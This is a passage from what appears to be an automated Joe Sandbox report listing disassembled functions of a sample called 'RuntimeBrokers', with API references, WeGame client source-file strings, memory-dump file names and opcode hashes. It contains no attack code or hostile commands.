                                        • [Qos_http_handler] report offline data qos id= %d, xrefs: 6C13AFD7
                                        • d:\ci_dev\wegame_client\codes\common\src\qos_http_handler.cpp, xrefs: 6C13AFB8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: C_error@std@@Cnd_initThrow_std::_$?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@Mtx_lockMtx_unlockmemmove
                                        • String ID: [Qos_http_handler] report offline data qos id= %d$d:\ci_dev\wegame_client\codes\common\src\qos_http_handler.cpp
                                        • API String ID: 1988896588-2836032468
                                        • Opcode ID: 34b0b6dd1bfc03e5429a2116c0505081f3a6727e34be58560f33c41482bea684
                                        • Instruction ID: 6bbd1ab696939aa0418328e487cd7760c0e1e2c3f5677aa9ff11e18850bf4989
                                        • Opcode Fuzzy Hash: 34b0b6dd1bfc03e5429a2116c0505081f3a6727e34be58560f33c41482bea684
                                        • Instruction Fuzzy Hash: 7841E371A04258AFCB05DBA4C850BEEBBB8EF05318F1041A9E155A77C1DB79AB09CF52
                                        Function 6C1722D5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C1722DC
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,0000006C,6C17228A,?,?,?,?,00000054), ref: 6C17241A
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                          • Part of subcall function 6C0E5AA6: __EH_prolog3_GS.LIBCMT ref: 6C0E5AAD
                                          • Part of subcall function 6C0E5AA6: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(00000000,?,00000024,6C100C4F,?,?,?), ref: 6C0E5ADD
                                          • Part of subcall function 6C0E5AA6: ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,00000000,?,00000024,6C100C4F,?,?,?), ref: 6C0E5AE5
                                        • ?file_exists@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,00000000), ref: 6C17238F
                                          • Part of subcall function 6C12F111: _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,?,6C12F0F8,?,?,?,?,?,?,?,?,0000001C), ref: 6C12F122
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,00000000), ref: 6C172385
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?wstring@path@filesystem@ierd_tgp@@H_prolog3_W@2@@std@@W@2@@std@@@$??0path@filesystem@ierd_tgp@@??_0path@filesystem@ierd_tgp@@?file_exists@common@ierd_tgp@@H_prolog3V012@V012@@_waccessmemmove
                                        • String ID: TCLS$rail_files\TCLS
                                        • API String ID: 1928432721-1818506932
                                        • Opcode ID: 6b81c4d9c066617adc7333737d8f927827f1bc1133ab3bc18aca23b76a628582
                                        • Instruction ID: a4cae8d422dcdbbd5b1a8669382d11ea00de78c22420b0af52591150c351f2ab
                                        • Opcode Fuzzy Hash: 6b81c4d9c066617adc7333737d8f927827f1bc1133ab3bc18aca23b76a628582
                                        • Instruction Fuzzy Hash: F44117B1C05288DADB15DBE4C884BDDFBB4AF25308F64416DD101B7642DB756B09CBA1
                                        Function 004626CC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 98windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Static,?), ref: 00462788
                                        • SendMessageW.USER32(00000000,0000004A,?,00000000), ref: 004627C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: FindMessageSendWindow
                                        • String ID: -#F$Static$TCLSHostApp::SendServerDirToTgp(), result: %d$_TGP_SERVER_DIR_WND_NAME_
                                        • API String ID: 1741975844-1243975535
                                        • Opcode ID: df22fcb2e43f7beb30fb7c51ccd0c98079db395c2caa3b96531bb322d30bd085
                                        • Instruction ID: e981cd5e1b49d19922a1fa3d756baa794ee670fda49cf95a1ec22537c7f7ca2f
                                        • Opcode Fuzzy Hash: df22fcb2e43f7beb30fb7c51ccd0c98079db395c2caa3b96531bb322d30bd085
                                        • Instruction Fuzzy Hash: B1412371D00648EFDB00DFE8CA49BDDBBB4BF08318F24416AE411AB291E7786A49DB15
                                        Function 0041E2DD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: htonl
                                        • String ID: uA
                                        • API String ID: 2009864989-3888042258
                                        • Opcode ID: 4e1b658295aea38123162e4e25112cf5a75784bdfe26f44f015ec49323bd6e96
                                        • Instruction ID: 9b1ff8798272eca5a973dc6bc5976d84521aecd709542916e49619d9605d5413
                                        • Opcode Fuzzy Hash: 4e1b658295aea38123162e4e25112cf5a75784bdfe26f44f015ec49323bd6e96
                                        • Instruction Fuzzy Hash: A241E7B5A00209DFDF08CF98D996AEDBBF0FF18315F114429DA12A7290D735A982DB54
                                        Function 6C0DE054 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0DE05B
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 6C0DE080
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 6C0DE0FC
                                        Strings
                                        • SendData error, data size:%u too large, xrefs: 6C0DE0C4
                                        • SendData error, input param is invalid, xrefs: 6C0DE134
                                        • d:\ci_dev\wegame_client\codes\common\src\base_named_pipe.cpp, xrefs: 6C0DE0AC, 6C0DE120
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3_H_prolog3_catch_
                                        • String ID: SendData error, data size:%u too large$SendData error, input param is invalid$d:\ci_dev\wegame_client\codes\common\src\base_named_pipe.cpp
                                        • API String ID: 2321812390-4266514423
                                        • Opcode ID: d484e0c28654059320a263905403437024525a4bf40f95d8d65c1c6ea1cf369a
                                        • Instruction ID: a73654ba12cad8233f36632a9a3542ffe208dfce9d515a9b36d39a4786233a63
                                        • Opcode Fuzzy Hash: d484e0c28654059320a263905403437024525a4bf40f95d8d65c1c6ea1cf369a
                                        • Instruction Fuzzy Hash: A821C131B01B04A7DB24EBA48C15F9E77F55F81B18F224148A8207BBC4DB76BA09CAC5
                                        Function 6C0E2EA4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0E2EAB
                                          • Part of subcall function 6C0E2F8D: __EH_prolog3.LIBCMT ref: 6C0E2F94
                                        • ?native@path@filesystem@ierd_tgp@@QBEABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?,0000006C,6C0E2E8E,00000002,00000002,00000004,6C0E2E5D,00000002,?,00000004,6C167512,?,?,net_daemon_path,0000002E), ref: 6C0E2F1D
                                        Strings
                                        • conversion of data to type ", xrefs: 6C0E2F2E
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp, xrefs: 6C0E2F7C
                                        • class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std, xrefs: 6C0E2F81
                                        • " failed, xrefs: 6C0E2F53
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?native@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID: " failed$class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std$conversion of data to type "$d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp
                                        • API String ID: 1752058968-2167445750
                                        • Opcode ID: 1e67827d6b6c8d17ba701221c52ac962a9ee22e168cde1abbd89e96b087d3934
                                        • Instruction ID: 7f2eb7c88810f4d1777856ae11dc823501871d0d3d7491f696e2177edd937544
                                        • Opcode Fuzzy Hash: 1e67827d6b6c8d17ba701221c52ac962a9ee22e168cde1abbd89e96b087d3934
                                        • Instruction Fuzzy Hash: FF217C71C01298AECB01CFF4C848BDEBBF8AF19208F544459E445BBB41DB75AA09CBA1
                                        Function 6C1567B7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C1567BE
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,6C3411A4,00000068), ref: 6C1567F3
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,6C3411A4,00000068), ref: 6C1567FF
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        • ?SetFileAuthority@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(?,?,?,?,?,6C3411A4,00000068), ref: 6C156860
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C156823
                                        • [Sys_wrapper]SetFileAuthority, path empty: %s, xrefs: 6C156840
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?get_log_instance@base@@?u8to16@common@ierd_tgp@@Authority@D@2@@std@@D@std@@FileH_prolog3Logger@1@Sys_wrapper@common@ierd_tgp@@U?$char_traits@V?$allocator@V?$basic_string@W@2@@4@@W@2@@std@@@
                                        • String ID: [Sys_wrapper]SetFileAuthority, path empty: %s$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 2090060014-4293479081
                                        • Opcode ID: 2e047dba34250fba53c9afc1437db3e094f4cf149b8bada01e7ef1c4a2fa848c
                                        • Instruction ID: d2fc13c4b7700d8a71a1e20d4f19157fb6d055e65b65ad456c1bdeff62c902db
                                        • Opcode Fuzzy Hash: 2e047dba34250fba53c9afc1437db3e094f4cf149b8bada01e7ef1c4a2fa848c
                                        • Instruction Fuzzy Hash: 2D2193719013099FDB10DFA4C881ADDB7B4AF25318F64055DE114BBB90DB35AE58CBA1
                                        Function 6C13E965 Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C13E96C
                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000014,6C140919,?,?,?,6C13ECAD,00000004,6C14BB84,00000008,6C14BE3F,?,00000001,0000001C,6C14BD63,?), ref: 6C13E977
                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,6C13ECAD,00000004,6C14BB84,00000008,6C14BE3F,?,00000001,0000001C,6C14BD63,?,?,?,00000038), ref: 6C13E98F
                                        • std::locale::_Getfacet.LIBCPMT ref: 6C13E999
                                          • Part of subcall function 6C0BD022: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000008,?,?,6C0B8242,00000000), ref: 6C0BD047
                                        • std::_Facet_Register.LIBCPMT ref: 6C13E9CA
                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,6C13ECAD,00000004,6C14BB84,00000008,6C14BE3F,?,00000001,0000001C,6C14BD63,?,?,?,00000038), ref: 6C13E9EA
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC28,00000000,?,?,6C13ECAD,00000004,6C14BB84,00000008,6C14BE3F,?,00000001,0000001C,6C14BD63,?,?), ref: 6C13EA09
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowstd::_std::locale::_
                                        • String ID:
                                        • API String ID: 2295579510-0
                                        • Opcode ID: bc685f7d903cab66326f1c2ae39b48e095dcede7b1eaee06862f78075efc7070
                                        • Instruction ID: 6be4615101c19dc79bfe37bb6102a82c5ac8227c653454c234cf29f48add3e13
                                        • Opcode Fuzzy Hash: bc685f7d903cab66326f1c2ae39b48e095dcede7b1eaee06862f78075efc7070
                                        • Instruction Fuzzy Hash: 4011BF31A00629CBCF15DFA4C8489EDB7B8BF49318B200649E429B7790DB34AE05CB91
                                        Function 6C11E55A Relevance: 10.6, APIs: 7, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C11E561
                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000014,6C122A6B,?,?,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?), ref: 6C11E56C
                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?,?,?,?,?,?,?), ref: 6C11E584
                                        • std::locale::_Getfacet.LIBCPMT ref: 6C11E58E
                                          • Part of subcall function 6C0BD022: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000008,?,?,6C0B8242,00000000), ref: 6C0BD047
                                        • std::_Facet_Register.LIBCPMT ref: 6C11E5BF
                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?,?,?,?,?,?), ref: 6C11E5DF
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DBC28,00000000,?,6C11E983,00000004,6C11EAC7,00000008,6C121858,?,00000001,?,?), ref: 6C11E5FE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowstd::_std::locale::_
                                        • String ID:
                                        • API String ID: 2295579510-0
                                        • Opcode ID: 35279155041057e9a94b046c7d6fb0b9c4c425db4ecaa766267a628afc6cd78d
                                        • Instruction ID: 364504e0da4b2a8270d8fb4dd3d4ffcbaf0ab35c69ed79fd73b6b2b8fff01bd4
                                        • Opcode Fuzzy Hash: 35279155041057e9a94b046c7d6fb0b9c4c425db4ecaa766267a628afc6cd78d
                                        • Instruction Fuzzy Hash: 9B11C475A04218CBCF15DFE4C8485EDB7B8BF58314B200519E429B7B90EF399B05CB91
                                        Function 0044E4FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcW.USER32(00000069,?,?,?), ref: 0044E580
                                        • PostQuitMessage.USER32(00000000), ref: 0044E58C
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0044E5A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ProcWindow$MessagePostQuit
                                        • String ID: i
                                        • API String ID: 3304905-3865851505
                                        • Opcode ID: e9c6ae58da793ef2f699c9b2658db5dcc4a0da426e21abeca989aba5373f5824
                                        • Instruction ID: 9a1187e8f8cbb0a8e2744894b0d090e454c0636c3481cfbfc41aa933f49bc884
                                        • Opcode Fuzzy Hash: e9c6ae58da793ef2f699c9b2658db5dcc4a0da426e21abeca989aba5373f5824
                                        • Instruction Fuzzy Hash: 91114C31500209FFEF11DF95CC0AAAD7BB1FF24306F108866F915A6160E3399A62FB06
                                        Function 0049C301 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C308
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C312
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C363
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C383
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C3A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID: nX
                                        • API String ID: 651022567-2063534963
                                        • Opcode ID: 854310db4c95cd3ec81b3e0bf026ffc3efdb632d75c8ac0a09748e2bafa2ce35
                                        • Instruction ID: 7523dbe477ba8c94590d04e259910075a6062d9bea2649e694e4c74c5df0d0bf
                                        • Opcode Fuzzy Hash: 854310db4c95cd3ec81b3e0bf026ffc3efdb632d75c8ac0a09748e2bafa2ce35
                                        • Instruction Fuzzy Hash: 5111C271900118ABCF11EBA5D845AEE7BB4BF54314F24051FF811B72A1DF389E059799
                                        Function 0049C4F3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C4FA
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C504
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C555
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C575
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C593
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
